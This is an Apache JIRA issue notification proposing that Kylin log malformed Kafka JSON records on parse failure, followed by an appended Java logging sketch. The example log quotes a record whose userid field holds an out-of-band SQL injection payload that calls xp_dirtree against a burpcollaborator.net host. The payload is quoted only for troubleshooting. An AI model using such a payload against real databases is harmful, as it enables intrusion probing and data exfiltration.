[ https://issues.apache.org/jira/browse/KYLIN-3767?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16740450#comment-16740450 ]
ASF GitHub Bot commented on KYLIN-3767:
---------------------------------------

shaofengshi commented on pull request #428: KYLIN-3767 Print the malformed JSON data consumed from Kafka Topic
URL: https://github.com/apache/kylin/pull/428

----------------------------------------------------------------
This is an automated message from the Apache Git Service.
To respond to the message, please log on GitHub and use the
URL above to go to the specific comment.

For queries about this service, please contact Infrastructure at:
us...@infra.apache.org

> Print the malformed JSON data consumed from Kafka Topic
> -------------------------------------------------------
>
>                 Key: KYLIN-3767
>                 URL: https://issues.apache.org/jira/browse/KYLIN-3767
>             Project: Kylin
>          Issue Type: Improvement
>          Components: Job Engine
>    Affects Versions: v2.2.0, v2.3.0, v2.4.0
>            Reporter: Temple Zhou
>            Assignee: Temple Zhou
>            Priority: Major
>         Attachments: KYLIN-3767.master.001.patch
>
>
> Recently, the build of my cube with streaming data failed, so I checked
> the syslog of the failed MR job.
> But the log contents, shown below, didn't help:
> {code:java}
> 2019-01-11 15:12:48,774 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268
> 2019-01-11 15:12:48,776 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768
> 2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
> 2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
> 2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
> 2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
>  at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
>     at org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
>     at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
>     at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
>     at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
>     at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
>     at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
>     at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
>     at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
>     at java.security.AccessController.doPrivileged(Native Method)
>     at javax.security.auth.Subject.doAs(Subject.java:422)
>     at org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
>     at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
> {code}
> The stack trace shows that parsing failed, but not which record caused the
> failure. It would help troubleshooting if the malformed JSON data were also
> printed in the syslog, like this:
> {code:java}
> ...
> 2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
> 2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
> 2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
> 2019-01-11 15:12:48,785 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data: {"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare @q varchar(99);set @q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; exec master.dbo.xp_dirtree @q;-- "}
> 2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
>  at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
>     at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
> ...
> {code}

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
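
The request above (log the raw record before the parse exception) could be sketched roughly as follows. This is not the attached patch or the code from pull request #428. The class `MalformedPayloadLogging` and the methods `payloadAsString` and `parseOrLog` are hypothetical names, the parser is passed in as a plain function so that the example does not depend on Jackson, and `java.util.logging` stands in for whatever logger the real parser class uses. It also assumes the payload is UTF-8 text.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.util.function.Function;
import java.util.logging.Level;
import java.util.logging.Logger;

// Hypothetical helper, for illustration only; not part of Kylin.
final class MalformedPayloadLogging {
    private static final Logger LOG =
            Logger.getLogger(MalformedPayloadLogging.class.getName());

    // Decode the remaining bytes as UTF-8 (assumed encoding). Working on a
    // duplicate leaves the caller's position and limit untouched.
    static String payloadAsString(ByteBuffer buffer) {
        return StandardCharsets.UTF_8.decode(buffer.duplicate()).toString();
    }

    // Run the supplied parser. If it throws, log the raw payload first and
    // the exception second, then return null so the caller can skip the record.
    static <T> T parseOrLog(ByteBuffer buffer, Function<ByteBuffer, T> parser) {
        try {
            // Hand the parser its own view so a partial read cannot
            // change what gets logged afterwards.
            return parser.apply(buffer.duplicate());
        } catch (RuntimeException e) {
            LOG.log(Level.SEVERE, "malformed data: " + payloadAsString(buffer));
            LOG.log(Level.SEVERE, "error", e);
            return null;
        }
    }

    public static void main(String[] args) {
        // A payload with an invalid JSON escape (\h), similar in spirit to the report.
        byte[] raw = "{\"userid\":\"net\\hsh\"}".getBytes(StandardCharsets.UTF_8);
        ByteBuffer record = ByteBuffer.wrap(raw);

        // Stand-in parser that always fails; a real one would call a JSON library.
        Object parsed = parseOrLog(record, b -> {
            throw new IllegalArgumentException("Unrecognized character escape 'h'");
        });
        System.out.println("parsed = " + parsed);
    }
}
```

Decoding from a duplicate of the buffer matters because the parser may already have consumed part of the input when it fails. Logging raw records can also write untrusted or sensitive data into the job log, so whether to truncate or mask the payload is a separate decision this sketch does not make.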